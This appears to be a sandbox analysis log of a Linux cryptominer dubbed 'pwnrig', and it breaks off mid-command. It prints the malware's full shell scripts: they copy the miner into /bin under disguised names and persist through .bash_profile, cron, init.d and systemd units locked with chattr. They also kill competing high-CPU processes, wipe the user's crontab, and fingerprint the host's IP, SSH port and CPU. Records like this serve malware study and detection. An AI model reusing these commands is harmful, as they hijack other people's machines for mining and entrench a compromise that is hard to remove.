/bin/shsh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then SNIFFDIR='/bin';PWNDIR='/bin'; else rm -rf /tmp/.pwn 2>/dev/null;mkdir /tmp/.pwn 2>/dev/null;SNIFFDIR='/tmp/.pwn';PWNDIR='/tmp';fi;PWNRIG='pwnrig';PWNRIGE='pwnrige';PWNRIGL='pwnrigl';CROND='crondr';SYSD='sysdr';INITD='initdr';BPROFILE='bprofr';MINER='/tmp/service-agent';PROGRAM='-bash';if [ `id -u 2>/dev/null` -eq '0' ]; then chattr -i -a \$SNIFFDIR/\$BPROFILE ~/.bash_profile >/dev/null 2>&1;fi;rm -rf \$SNIFFDIR/\$BPROFILE 2>/dev/null;sed -i \"/\$BPROFILE/d\" ~/.bash_profile 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$BPROFILE 2>/dev/null;echo \"cp -f -r -- \$SNIFFDIR/\$BPROFILE \$PWNDIR/\$PROGRAM 2>/dev/null && \$PWNDIR/\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d >/dev/null 2>&1 && rm -rf -- \$PWNDIR/\$PROGRAM 2>/dev/null\" >> ~/.bash_profile 2>/dev/null;if [ `id -u 2>/dev/null` -eq '0' ]; then chattr +i +a \$SNIFFDIR/\$BPROFILE ~/.bash_profile >/dev/null 2>&1;mkdir -p /etc/cron.d /etc/cron.daily /etc/cron.hourly /etc/cron.monthly /etc/cron.weekly 2>/dev/null;chattr -i -a /etc/cron.*/\$PWNRIG \$SNIFFDIR/\$CROND >/dev/null 2>&1;rm -rf \$SNIFFDIR/\$CROND 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$CROND 2>/dev/null;echo -e \"#!/bin/bash\\ncp -f -r -- \$SNIFFDIR/\$CROND \$PWNDIR/\$PROGRAM 2>/dev/null\\ncd \$PWNDIR 2>/dev/null\\n./\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d >/dev/null 2>&1\\nrm -rf -- \$PROGRAM 2>/dev/null\\n\" | tee /etc/cron.d/\$PWNRIG /etc/cron.daily/\$PWNRIG /etc/cron.hourly/\$PWNRIG /etc/cron.monthly/\$PWNRIG /etc/cron.weekly/\$PWNRIG > /dev/null;sed -i '1 s/-e //' /etc/cron.*/\$PWNRIG 2>/dev/null;chmod +x /etc/cron.*/\$PWNRIG \$SNIFFDIR/\$CROND 2>/dev/null;chattr +i +a /etc/cron.*/\$PWNRIG \$SNIFFDIR/\$CROND >/dev/null 2>&1;if which chkconfig > /dev/null 2>&1; then chattr -i -a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;chkconfig \$PWNRIG off 2>/dev/null;chkconfig --del \$PWNRIG 2>/dev/null;rm -rf \$SNIFFDIR/\$INITD 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$INITD 2>/dev/null;echo -e \"#!/bin/bash\\n#\\n# \$PWNRIG Start/Stop the \$PWNRIG clock daemon.\\n#\\n# chkconfig: 2345 90 60\\n# description: \$PWNRIG (by pwned)\\ncp -f -r -- \$SNIFFDIR/\$INITD \$PWNDIR/\$PROGRAM 2>/dev/null\\ncd \$PWNDIR 2>/dev/null\\n./\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d 2>/dev/null\\nrm -rf -- \$PROGRAM 2>/dev/null\\n\" | tee /etc/init.d/\$PWNRIG > /dev/null;sed -i '1 s/-e //' /etc/init.d/\$PWNRIG 2>/dev/null;chmod +x /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD 2>/dev/null;chkconfig --add \$PWNRIG 2>/dev/null;chkconfig \$PWNRIG on 2>/dev/null;chattr +i +a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;fi;if which update-rc.d > /dev/null 2>&1; then chattr -i -a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;update-rc.d -f \$PWNRIG disable >/dev/null 2>&1;update-rc.d -f \$PWNRIG remove >/dev/null 2>&1;rm -rf \$SNIFFDIR/\$INITD 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$INITD 2>/dev/null;echo -e \"#!/bin/bash\\n### BEGIN INIT INFO\\n# Provides: \$PWNRIG\\n# Required-Start: \$all\\n# Required-Stop:\\n# Default-Start: 2 3 4 5\\n# Default-Stop:\\n# Short-Description: \$PWNRIG (by pwned)\\n### END INIT INFO\\ncp -f -r -- \$SNIFFDIR/\$INITD \$PWNDIR/\$PROGRAM 2>/dev/null\\ncd \$PWNDIR 2>/dev/null\\n./\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d 2>/dev/null\\nrm -rf -- \$PROGRAM 2>/dev/null\\n\" | tee /etc/init.d/\$PWNRIG > /dev/null;sed -i '1 s/-e //' /etc/init.d/\$PWNRIG 2>/dev/null;chmod +x /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD 2>/dev/null;update-rc.d \$PWNRIG defaults >/dev/null 2>&1;update-rc.d \$PWNRIG enable >/dev/null 2>&1;chattr +i +a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;fi;if which systemctl > /dev/null 2>&1; then chattr -i -a /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service \$SNIFFDIR/\$SYSD >/dev/null 2>&1;rm -rf \$SNIFFDIR/\$SYSD 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$SYSD 2>/dev/null;echo -e \"[Unit]\\nDescription=\$PWNRIG\\n\\nWants=network.target\\nAfter=syslog.target network-online.target\\n\\n[Service]\\nType=forking\\nExecStart=/bin/bash -c 'cp -f -r -- \$SNIFFDIR/\$SYSD \$PWNDIR/\$PROGRAM 2>/dev/null && \$PWNDIR/\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d >/dev/null 2>&1 && rm -rf -- \$PWNDIR/\$PROGRAM 2>/dev/null'\\nRestart=always\\nKillMode=process\\n\\n[Install]\\nWantedBy=multi-user.target\" | tee /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service >/dev/null;sed -i '1 s/-e //' /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service 2>/dev/null;chattr +i +a /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service \$SNIFFDIR/\$SYSD >/dev/null 2>&1;systemctl enable \$PWNRIGE.service 2> /dev/null;systemctl enable \$PWNRIGL.service 2> /dev/null;systemctl daemon-reload 2> /dev/null;systemctl reload-or-restart \$PWNRIGE.service 2> /dev/null;systemctl reload-or-restart \$PWNRIGL.service 2> /dev/null;fi;fi"2⤵
- Writes file to tmp directory
PID:3905 -
/usr/bin/idid -u3⤵PID:3906
-
-
/usr/bin/idid -u3⤵PID:3907
-
-
/usr/bin/chattrchattr -i -a /bin/bprofr "~/.bash_profile"3⤵
- Attempts to change immutable files
PID:3908
-
-
/usr/bin/rmrm -rf /bin/bprofr3⤵PID:3909
-
-
/usr/bin/sedsed -i /bprofr/d "~/.bash_profile"3⤵PID:3910
-
-
/usr/bin/cpcp -f -r -- /tmp/service-agent /bin/bprofr3⤵
- Writes file to system bin folder
PID:3911
-
-
/usr/bin/idid -u3⤵PID:3912
-
-
/usr/bin/chattrchattr +i +a /bin/bprofr "~/.bash_profile"3⤵PID:3913
-
-
/usr/bin/mkdirmkdir -p /etc/cron.d /etc/cron.daily /etc/cron.hourly /etc/cron.monthly /etc/cron.weekly3⤵PID:3914
-
-
/usr/bin/chattrchattr -i -a /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig /bin/crondr3⤵PID:3915
-
-
/usr/bin/rmrm -rf /bin/crondr3⤵PID:3916
-
-
/usr/bin/cpcp -f -r -- /tmp/service-agent /bin/crondr3⤵
- Writes file to system bin folder
PID:3917
-
-
/usr/bin/teetee /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig3⤵
- Creates/modifies Cron job
PID:3919
-
-
/usr/bin/sedsed -i "1 s/-e //" /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig3⤵
- Creates/modifies Cron job
PID:3920
-
-
/usr/bin/chmodchmod +x /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig /bin/crondr3⤵PID:3921
-
-
/usr/bin/chattrchattr +i +a /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig /bin/crondr3⤵PID:3922
-
-
/usr/bin/whichwhich chkconfig3⤵PID:3923
-
-
/usr/bin/whichwhich update-rc.d3⤵PID:3924
-
-
/usr/bin/chattrchattr -i -a /etc/init.d/pwnrig /bin/initdr3⤵PID:3925
-
-
/usr/sbin/update-rc.dupdate-rc.d -f pwnrig disable3⤵
- Flushes firewall rules
PID:3926 -
/usr/local/sbin/systemctlsystemctl --quiet disable pwnrig4⤵PID:3927
-
-
/usr/local/bin/systemctlsystemctl --quiet disable pwnrig4⤵PID:3927
-
-
/usr/sbin/systemctlsystemctl --quiet disable pwnrig4⤵PID:3927
-
-
/usr/bin/systemctlsystemctl --quiet disable pwnrig4⤵
- Reads EFI boot settings
PID:3927
-
-
/usr/local/sbin/systemctlsystemctl daemon-reload4⤵PID:3954
-
-
/usr/local/bin/systemctlsystemctl daemon-reload4⤵PID:3954
-
-
/usr/sbin/systemctlsystemctl daemon-reload4⤵PID:3954
-
-
/usr/bin/systemctlsystemctl daemon-reload4⤵
- Reads EFI boot settings
PID:3954
-
-
-
/usr/sbin/update-rc.dupdate-rc.d -f pwnrig remove3⤵PID:3980
-
/usr/local/sbin/systemctlsystemctl daemon-reload4⤵PID:3981
-
-
/usr/local/bin/systemctlsystemctl daemon-reload4⤵PID:3981
-
-
/usr/sbin/systemctlsystemctl daemon-reload4⤵PID:3981
-
-
/usr/bin/systemctlsystemctl daemon-reload4⤵
- Reads EFI boot settings
PID:3981
-
-
-
/usr/bin/rmrm -rf /bin/initdr3⤵PID:4007
-
-
/usr/bin/cpcp -f -r -- /tmp/service-agent /bin/initdr3⤵
- Writes file to system bin folder
PID:4008
-
-
/usr/bin/teetee /etc/init.d/pwnrig3⤵
- Modifies init.d
PID:4010
-
-
/usr/bin/chattrchattr +i +a /etc/init.d/pwnrig /bin/initdr3⤵PID:4068
-
-
/usr/bin/whichwhich systemctl3⤵PID:4069
-
-
/usr/bin/chattrchattr -i -a /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service /bin/sysdr3⤵PID:4070
-
-
/usr/bin/rmrm -rf /bin/sysdr3⤵PID:4071
-
-
/usr/bin/cpcp -f -r -- /tmp/service-agent /bin/sysdr3⤵
- Writes file to system bin folder
PID:4072
-
-
/usr/bin/teetee /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service3⤵
- Modifies systemd
PID:4074
-
-
/usr/bin/sedsed -i "1 s/-e //" /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service3⤵PID:4075
-
-
/usr/bin/chattrchattr +i +a /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service /bin/sysdr3⤵
- Attempts to change immutable files
PID:4076
-
-
/usr/bin/systemctlsystemctl enable pwnrige.service3⤵
- Reads EFI boot settings
PID:4077
-
-
/usr/bin/systemctlsystemctl enable pwnrigl.service3⤵
- Reads EFI boot settings
PID:4103
-
-
/usr/bin/systemctlsystemctl daemon-reload3⤵
- Reads EFI boot settings
PID:4129
-
-
/usr/bin/systemctlsystemctl reload-or-restart pwnrige.service3⤵
- Reads EFI boot settings
PID:4155
-
-
-
/usr/bin/hostnamehostname -I1⤵
- Attempts to change immutable files
PID:3870
-
/usr/bin/awkawk "{print \$1}"1⤵PID:3872
-
/usr/bin/awkawk "{print \"-\"\$2}"1⤵PID:3877
-
/usr/bin/headhead -n 11⤵PID:3876
-
/usr/bin/grepgrep "Port "1⤵PID:3875
-
/usr/bin/catcat /etc/ssh/sshd_config1⤵PID:3874
-
/usr/bin/sedsed -e "s/\$//"1⤵PID:3886
-
/usr/bin/sedsed -e "s/^ *//"1⤵PID:3885
-
/usr/bin/cutcut -d: -f21⤵PID:3884
-
/usr/bin/grepgrep -m 1 "model name" /proc/cpuinfo1⤵
- Checks CPU configuration
PID:3883
-
/usr/bin/awkawk "{print \$1}"1⤵PID:3889
-
/usr/bin/awkawk "{print \$4}"1⤵PID:3892
-
/usr/bin/awkawk "{print \$4}"1⤵PID:3895
-
/tmp/service-agent/tmp/service-agent -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d1⤵
- Executes dropped EXE
- Checks CPU configuration
- Checks hardware identifiers (DMI)
- Reads CPU attributes
- Reads hardware information
- Enumerates kernel/hardware configuration
- Writes file to tmp directory
PID:4212 -
/bin/shsh -c "echo \"[\$(hostname=\$(hostname -I 2>/dev/null || hostname -i 2>/dev/null);echo \$hostname | awk {'print \$1'} 2>/dev/null)\$(cat /etc/ssh/sshd_config 2>/dev/null | grep 'Port ' 2>/dev/null | head -n 1 2>/dev/null | awk {'print \"-\"\$2'} 2>/dev/null)][\$(whoami 2>/dev/null)][\$(hostname 2>/dev/null)][\$(grep -c ^processor /proc/cpuinfo 2>/dev/null)][\$(X=\$(grep -m 1 'model name' /proc/cpuinfo 2>/dev/null | cut -d: -f2 2>/dev/null | sed -e 's/^ *//' 2>/dev/null | sed -e 's/\$//' 2>/dev/null); if [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'QEMU' ]; then echo 'QEMU'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Haswell)' ]; then echo 'Haswell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Broadwell)' ]; then echo 'Broadwell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'AMD' ]; then echo \$X 2>/dev/null | awk {'print \$2\" \"\$3\" \"\$4'} 2>/dev/null; else echo \$X 2>/dev/null; fi)]\""2⤵PID:4236
-
/usr/bin/whoamiwhoami3⤵PID:4247
-
-
/usr/bin/hostnamehostname3⤵PID:4248
-
-
/usr/bin/grepgrep -c "^processor" /proc/cpuinfo3⤵
- Checks CPU configuration
PID:4249
-
-
-
/bin/shsh -c "ps -A -ostat,ppid 2>/dev/null | awk '/[zZ]/ && !a[\$2]++ {print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done;if [ `id -u 2>/dev/null` -eq '0' ]; then ps x 2>/dev/null | grep /etc/cron 2>/dev/null | grep -v grep 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"2⤵PID:4265
-
/usr/bin/awkawk "/[zZ]/ && !a[\$2]++ {print \$2}"3⤵PID:4267
-
-
/usr/bin/psps -A "-ostat,ppid"3⤵
- Reads CPU attributes
- Reads runtime system information
PID:4266
-
-
/usr/bin/idid -u3⤵PID:4269
-
-
/usr/bin/grepgrep -v grep3⤵PID:4272
-
-
/usr/bin/grepgrep /etc/cron3⤵PID:4271
-
-
/usr/bin/psps x3⤵
- Reads runtime system information
PID:4270
-
-
-
/bin/shsh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -v -- '-bash[[:space:]]*\$' 2>/dev/null | grep -v /usr/sbin/httpd 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done else ps -u `whoami 2>/dev/null` ux | grep -v grep 2>/dev/null | grep -v -- '-bash[[:space:]]*\$' 2>/dev/null | grep -v /usr/sbin/httpd 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"2⤵PID:4274
-
/usr/bin/idid -u3⤵PID:4275
-
-
/usr/bin/awkawk "{if(\$3>30.0) print \$2}"3⤵PID:4280
-
-
/usr/bin/grepgrep -v /usr/sbin/httpd3⤵PID:4279
-
-
/usr/bin/grepgrep -v -- "-bash[[:space:]]*\$"3⤵PID:4278
-
-
/usr/bin/grepgrep -v grep3⤵PID:4277
-
-
/usr/bin/psps aux3⤵
- Reads runtime system information
PID:4276
-
-
-
/bin/shsh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then if [ `ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | wc -l 2>/dev/null` -gt 1 ]; then ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi else myid=`whoami 2>/dev/null`; if [ `ps -u \$myid ux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | wc -l 2>/dev/null` -gt 1 ]; then ps -u \$myid ux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi fi"2⤵PID:4282
-
/usr/bin/idid -u3⤵PID:4283
-
-
-
/usr/bin/hostnamehostname -I1⤵PID:4239
-
/usr/bin/awkawk "{print \$1}"1⤵PID:4241
-
/usr/bin/awkawk "{print \"-\"\$2}"1⤵PID:4246
-
/usr/bin/headhead -n 11⤵PID:4245
-
/usr/bin/grepgrep "Port "1⤵PID:4244
-
/usr/bin/catcat /etc/ssh/sshd_config1⤵PID:4243
-
/usr/bin/sedsed -e "s/\$//"1⤵PID:4255
-
/usr/bin/sedsed -e "s/^ *//"1⤵PID:4254
-
/usr/bin/cutcut -d: -f21⤵PID:4253
-
/usr/bin/grepgrep -m 1 "model name" /proc/cpuinfo1⤵
- Checks CPU configuration
PID:4252
-
/usr/bin/awkawk "{print \$1}"1⤵PID:4258
-
/usr/bin/awkawk "{print \$4}"1⤵PID:4261
-
/usr/bin/awkawk "{print \$4}"1⤵PID:4264
-
/usr/bin/wcwc -l1⤵PID:4289
-
/usr/bin/awkawk "{if(\$3>30.0) print \$2}"1⤵PID:4288
-
/usr/bin/grepgrep -- "-bash[[:space:]]*\$"1⤵PID:4287
-
/usr/bin/grepgrep -v grep1⤵PID:4286
-
/usr/bin/psps aux1⤵PID:4285
-
/usr/bin/crontabcrontab -r1⤵PID:4290
-
/usr/bin/pkillpkill -f .klibsystem51⤵PID:4291
-
/usr/bin/pkillpkill -f .klibsystem41⤵
- Reads CPU attributes
PID:4292
-
/usr/bin/bashbash -c "echo \"* * * * * /tmp/.klibsystem5 >/dev/null 2>&1\" | crontab -"1⤵PID:4293
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:4295
-
-
/usr/bin/chattrchattr -ia /etc/cron.d/.lib-knlib41⤵PID:4296
-
/usr/bin/chattrchattr +ia /etc/cron.d/.lib-knlib41⤵PID:4297
-
/usr/bin/chattrchattr -ia /var/spool/cron/.lib-knlib41⤵
- Attempts to change immutable files
PID:4298
-
/usr/bin/chattrchattr +ia /var/spool/cron/.lib-knlib41⤵PID:4299
-
/usr/bin/chattrchattr -ia /etc/cron.hourly/.lib-knlib41⤵PID:4300
-
/usr/bin/chattrchattr +ia /etc/cron.hourly/.lib-knlib41⤵PID:4301
-
/usr/bin/chattrchattr -ia /etc/cron.daily/.lib-knlib41⤵PID:4302
-
/usr/bin/chattrchattr +ia /etc/cron.daily/.lib-knlib41⤵PID:4303
-
/usr/bin/chattrchattr -ia /etc/cron.weekly/.lib-knlib41⤵PID:4304
-
/usr/bin/chattrchattr +ia /etc/cron.weekly/.lib-knlib41⤵PID:4305
-
/usr/bin/chattrchattr -ia /etc/cron.monthly/.lib-knlib41⤵PID:4306
-
/usr/bin/chattrchattr +ia /etc/cron.monthly/.lib-knlib41⤵
- Attempts to change immutable files
PID:4307
-
/usr/bin/chattrchattr -ia /etc/anacrontab1⤵PID:4308
-
/usr/bin/chattrchattr +ia /etc/anacrontab1⤵
- Attempts to change immutable files
PID:4309
-
/tmp/sys-helper/tmp/sys-helper1⤵
- Executes dropped EXE
- Writes file to tmp directory
PID:4310
-
/tmp/service-agent/tmp/service-agent -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d -pwn1⤵
- Executes dropped EXE
- Checks CPU configuration
- Checks hardware identifiers (DMI)
- Reads CPU attributes
- Reads hardware information
- Enumerates kernel/hardware configuration
PID:4311 -
/bin/shsh -c "echo \"[\$(hostname=\$(hostname -I 2>/dev/null || hostname -i 2>/dev/null);echo \$hostname | awk {'print \$1'} 2>/dev/null)\$(cat /etc/ssh/sshd_config 2>/dev/null | grep 'Port ' 2>/dev/null | head -n 1 2>/dev/null | awk {'print \"-\"\$2'} 2>/dev/null)][\$(whoami 2>/dev/null)][\$(hostname 2>/dev/null)][\$(grep -c ^processor /proc/cpuinfo 2>/dev/null)][\$(X=\$(grep -m 1 'model name' /proc/cpuinfo 2>/dev/null | cut -d: -f2 2>/dev/null | sed -e 's/^ *//' 2>/dev/null | sed -e 's/\$//' 2>/dev/null); if [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'QEMU' ]; then echo 'QEMU'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Haswell)' ]; then echo 'Haswell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Broadwell)' ]; then echo 'Broadwell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'AMD' ]; then echo \$X 2>/dev/null | awk {'print \$2\" \"\$3\" \"\$4'} 2>/dev/null; else echo \$X 2>/dev/null; fi)]\""2⤵PID:4312
-
/usr/bin/whoamiwhoami3⤵PID:4323
-
-
/usr/bin/hostnamehostname3⤵PID:4324
-
-
/usr/bin/grepgrep -c "^processor" /proc/cpuinfo3⤵
- Checks CPU configuration
PID:4325
-
-
-
/bin/shsh -c "ps -A -ostat,ppid 2>/dev/null | awk '/[zZ]/ && !a[\$2]++ {print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done;if [ `id -u 2>/dev/null` -eq '0' ]; then ps x 2>/dev/null | grep /etc/cron 2>/dev/null | grep -v grep 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"2⤵PID:4341
-
/usr/bin/awkawk "/[zZ]/ && !a[\$2]++ {print \$2}"3⤵PID:4343
-
-
/usr/bin/psps -A "-ostat,ppid"3⤵PID:4342
-
-
/usr/bin/idid -u3⤵PID:4345
-
-
/usr/bin/grepgrep -v grep3⤵PID:4348
-
-
/usr/bin/grepgrep /etc/cron3⤵PID:4347
-
-
/usr/bin/psps x3⤵
- Reads runtime system information
PID:4346
-
-
-
/bin/shsh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then SNIFFDIR='/bin';PWNDIR='/bin'; else rm -rf /tmp/.pwn 2>/dev/null;mkdir /tmp/.pwn 2>/dev/null;SNIFFDIR='/tmp/.pwn';PWNDIR='/tmp';fi;PWNRIG='pwnrig';PWNRIGE='pwnrige';PWNRIGL='pwnrigl';CROND='crondr';SYSD='sysdr';INITD='initdr';BPROFILE='bprofr';MINER='/tmp/service-agent';PROGRAM='-bash';if [ `id -u 2>/dev/null` -eq '0' ]; then chattr -i -a \$SNIFFDIR/\$BPROFILE ~/.bash_profile >/dev/null 2>&1;fi;rm -rf \$SNIFFDIR/\$BPROFILE 2>/dev/null;sed -i \"/\$BPROFILE/d\" ~/.bash_profile 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$BPROFILE 2>/dev/null;echo \"cp -f -r -- \$SNIFFDIR/\$BPROFILE \$PWNDIR/\$PROGRAM 2>/dev/null && \$PWNDIR/\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d >/dev/null 2>&1 && rm -rf -- \$PWNDIR/\$PROGRAM 2>/dev/null\" >> ~/.bash_profile 2>/dev/null;if [ `id -u 2>/dev/null` -eq '0' ]; then chattr +i +a \$SNIFFDIR/\$BPROFILE ~/.bash_profile >/dev/null 2>&1;mkdir -p /etc/cron.d /etc/cron.daily /etc/cron.hourly /etc/cron.monthly /etc/cron.weekly 2>/dev/null;chattr -i -a /etc/cron.*/\$PWNRIG \$SNIFFDIR/\$CROND >/dev/null 2>&1;rm -rf \$SNIFFDIR/\$CROND 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$CROND 2>/dev/null;echo -e \"#!/bin/bash\\ncp -f -r -- \$SNIFFDIR/\$CROND \$PWNDIR/\$PROGRAM 2>/dev/null\\ncd \$PWNDIR 2>/dev/null\\n./\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d >/dev/null 2>&1\\nrm -rf -- \$PROGRAM 2>/dev/null\\n\" | tee /etc/cron.d/\$PWNRIG /etc/cron.daily/\$PWNRIG /etc/cron.hourly/\$PWNRIG /etc/cron.monthly/\$PWNRIG /etc/cron.weekly/\$PWNRIG > /dev/null;sed -i '1 s/-e //' /etc/cron.*/\$PWNRIG 2>/dev/null;chmod +x /etc/cron.*/\$PWNRIG \$SNIFFDIR/\$CROND 2>/dev/null;chattr +i +a /etc/cron.*/\$PWNRIG \$SNIFFDIR/\$CROND >/dev/null 2>&1;if which chkconfig > /dev/null 2>&1; then chattr -i -a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;chkconfig \$PWNRIG off 2>/dev/null;chkconfig --del \$PWNRIG 2>/dev/null;rm -rf \$SNIFFDIR/\$INITD 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$INITD 2>/dev/null;echo -e \"#!/bin/bash\\n#\\n# \$PWNRIG Start/Stop the \$PWNRIG clock daemon.\\n#\\n# chkconfig: 2345 90 60\\n# description: \$PWNRIG (by pwned)\\ncp -f -r -- \$SNIFFDIR/\$INITD \$PWNDIR/\$PROGRAM 2>/dev/null\\ncd \$PWNDIR 2>/dev/null\\n./\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d 2>/dev/null\\nrm -rf -- \$PROGRAM 2>/dev/null\\n\" | tee /etc/init.d/\$PWNRIG > /dev/null;sed -i '1 s/-e //' /etc/init.d/\$PWNRIG 2>/dev/null;chmod +x /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD 2>/dev/null;chkconfig --add \$PWNRIG 2>/dev/null;chkconfig \$PWNRIG on 2>/dev/null;chattr +i +a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;fi;if which update-rc.d > /dev/null 2>&1; then chattr -i -a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;update-rc.d -f \$PWNRIG disable >/dev/null 2>&1;update-rc.d -f \$PWNRIG remove >/dev/null 2>&1;rm -rf \$SNIFFDIR/\$INITD 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$INITD 2>/dev/null;echo -e \"#!/bin/bash\\n### BEGIN INIT INFO\\n# Provides: \$PWNRIG\\n# Required-Start: \$all\\n# Required-Stop:\\n# Default-Start: 2 3 4 5\\n# Default-Stop:\\n# Short-Description: \$PWNRIG (by pwned)\\n### END INIT INFO\\ncp -f -r -- \$SNIFFDIR/\$INITD \$PWNDIR/\$PROGRAM 2>/dev/null\\ncd \$PWNDIR 2>/dev/null\\n./\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d 2>/dev/null\\nrm -rf -- \$PROGRAM 2>/dev/null\\n\" | tee /etc/init.d/\$PWNRIG > /dev/null;sed -i '1 s/-e //' /etc/init.d/\$PWNRIG 2>/dev/null;chmod +x /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD 2>/dev/null;update-rc.d \$PWNRIG defaults >/dev/null 2>&1;update-rc.d \$PWNRIG enable >/dev/null 2>&1;chattr +i +a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;fi;if which systemctl > /dev/null 2>&1; then chattr -i -a /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service \$SNIFFDIR/\$SYSD >/dev/null 2>&1;rm -rf 